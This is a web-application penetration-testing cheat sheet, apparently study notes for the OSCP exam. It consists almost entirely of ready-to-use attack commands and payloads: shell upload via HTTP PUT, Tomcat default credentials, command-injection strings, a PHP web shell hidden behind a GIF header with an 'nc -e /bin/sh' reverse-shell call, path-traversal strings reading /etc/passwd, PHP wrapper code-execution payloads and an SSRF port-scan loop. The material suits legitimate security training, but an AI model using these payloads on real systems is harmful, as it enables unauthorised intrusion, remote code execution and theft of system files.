OSCP
Search…
Web Application
Checking HTTP Methods
1
curl -i -X OPTIONS http://XXXX
2
nmap --script http-methods --script-args http-methods.url-path='/test' $ip
3
Curl usage
4
curl -X POST http://internal-01.bart.htb/simple_chat/register.php -d "uname=0xdf&passwd=password"
Copied!
Shell via Put Method
1
Put Shell
2
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"
3
curl -X MOVE --header "Destination:http://ip/asp.asp" "http://ip/asp.txt"
Copied!
RFI
1
$ fimap -u "http://$ip/example.php?test="
2
$ https://github.com/lightos/Panoptic/
Copied!
JBOSS
1
JMX Console http://$ip:8080/jmxconcole/
2
Copied!
Tomcat Manager Default Credentials
1
Tomcat manager, try default credentials: tomcat/tomcat, admin/manager, admin/password, admin/s3cret, admin (emtpy password).
2
Copied!
Command Injection
1
Command injection
2
`id`
3
| id
4
&& id
5
error || id
6
%0a id
Copied!
File upload bypass
1
content-type:image/gif
2
GIF89a <?php echo system{$_REQUEST['ippsec']); ?>
3
?ippsec=nc -e /bin/sh ip port
Copied!
SQL Shell
1
msql -u root -p
2
\! /bin/sh
Copied!
LFI
1
Linux
2
../../../../../../../../../../etc/passwd
3
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4
../../../../../../../../../../etc/passwd%00
5
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
6
7
Windows
8
../../../../../../../../../../boot.ini
9
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
10
../../../../../../../../../../boot.ini%00
11
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
12
Wordlists
13
/usr/share/wordlists/SecLists/Fuzzing/JHADDIX_LFI.txt
Copied!
LFI Wrappers
1
LFI Wrappers
2
expect://
3
http://x.x.x.x/blah?parameter=expect://whoami
4
data://
5
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
6
# the base64 encoded payload is: <? phpinfo(); ?>
7
input://
8
http://x.x.x.x/blah?parameter=php://input
9
# POST data (using Hackbar)
10
<? phpinfo(); ?>
Copied!
LFI to RCE
1
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-data
2
Copied!
SSRF
1
for i in $(seq 1 60000); do echo $i; curl -X GET http://ip:60000/url.php?path=http://localhost:$i/ 2> /dev/null | tr -d “\n”; done
2
Copied!
Last modified 1yr ago
Copy link